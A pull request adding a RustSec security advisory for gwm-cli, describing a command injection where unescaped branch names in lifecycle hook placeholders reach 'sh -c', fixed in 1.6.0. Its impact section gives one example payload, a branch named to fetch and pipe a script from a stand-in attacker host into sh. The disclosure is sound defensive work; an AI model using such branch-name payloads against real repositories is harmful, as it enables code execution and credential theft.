### PR TITLE
Add advisory for gwm-cli: command injection through a branch name in lifecycle hook expansion

### DIFF
--- a/crates/gwm-cli/RUSTSEC-0000-0000.md
+++ b/crates/gwm-cli/RUSTSEC-0000-0000.md
@@ -1,0 +1,66 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "gwm-cli"
+date = "2026-08-03"
+url = "https://github.com/kbrdn1/gwm-cli/security/advisories/GHSA-fffq-vg6f-gxqm"
+references = ["https://github.com/kbrdn1/gwm-cli/blob/main/changelogs/1.6.0.md"]
+categories = ["code-execution"]
+cvss = "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+keywords = ["command-injection", "shell", "hooks", "branch-name"]
+aliases = ["GHSA-fffq-vg6f-gxqm"]
+
+[versions]
+patched = [">= 1.6.0"]
+```
+
+# Command injection through a branch name in lifecycle hook expansion
+
+Affected versions of `gwm-cli` expanded lifecycle hook placeholders into a
+shell command without escaping them. `lifecycle::run_step` substituted the
+placeholders into the step's `run` string and handed the result to `sh -c`:
+
+```rust
+let run = expand_placeholders(&step.run, ctx);
+let mut cmd = Command::new("sh");
+cmd.arg("-c").arg(&run).current_dir(&ctx.cwd);
+```
+
+`{branch}` takes its value from git, and git permits `;`, `|`, `&`, `$`,
+backticks, parentheses, `<` and `>` in a ref name. None of them were escaped,
+so a branch name could terminate the hook's command and start another one.
+
+## Impact
+
+Arbitrary command execution as the user running `gwm`, in their repository,
+with their credentials on disk.
+
+A `.gwm.toml` hook is already an execution primitive behind gwm's
+trust-on-first-use gate, and that part is by design. The vulnerability is that
+the branch name is data rather than code and was not treated as such: a user
+who had legitimately trusted their own repository's hooks could be attacked
+through a branch they never wrote.
+
+1. The attacker pushes a branch named `x;curl attacker.example/p|sh` to a
+   repository the victim contributes to. A fork pull request branch is enough.
+2. The victim fetches. `git fetch` on its own is harmless.
+3. The victim runs any gwm command that fires a hook against that worktree
+   (`gwm remove`, `gwm bootstrap`, or create hooks on a re-created worktree).
+4. The injected command runs.
+
+No trust prompt is involved at step 3: the victim already approved the
+`.gwm.toml`. The gate asks whether the repository's hooks are trusted and never
+covered the branch name flowing into them.
+
+## Patch
+
+Fixed in 1.6.0. Placeholder values are shell-escaped when they are expanded
+into a hook's `run` script. `env` values are deliberately left unescaped, since
+they go to the process environment and never reach a shell, so escaping them
+would insert literal quote characters into what the hook reads back. Hooks also
+receive their context as `GWM_BRANCH`, `GWM_PATH`, `GWM_TYPE`, `GWM_ISSUE`,
+`GWM_DESC`, `GWM_USER`, `GWM_OWNER` and `GWM_REPO` environment variables, which
+need no quoting at all.
+
+Reported and fixed by the crate author. There is no backport: upgrade to
+1.6.0.


### PR DESCRIPTION
Filed by the crate author.

`gwm-cli` expanded lifecycle-hook placeholders into a `sh -c` command without
escaping them. `{branch}` takes its value from git, which permits `;`, `|`,
`&`, `$`, backticks, parentheses and redirections in a ref name, so a branch
name could terminate the hook's command and start another one. A branch can
arrive from someone else's push, so a user who had legitimately trusted their
own repository's hooks through the tool's trust-on-first-use gate could be
attacked through a branch they never wrote, with no prompt in the path.

- Advisory:
  https://github.com/kbrdn1/gwm-cli/security/advisories/GHSA-fffq-vg6f-gxqm
  (published 2026-08-03, high, CWE-78 / CWE-88)
- Affected: `<= 1.5.0`. Patched: `>= 1.6.0`, published to crates.io on
  2026-08-03.
- Release notes:
  https://github.com/kbrdn1/gwm-cli/blob/main/changelogs/1.6.0.md

The coordinated-disclosure prerequisites in CONTRIBUTING do not apply here: I
am the maintainer, the fix shipped before this PR, and the GHSA is already
public.
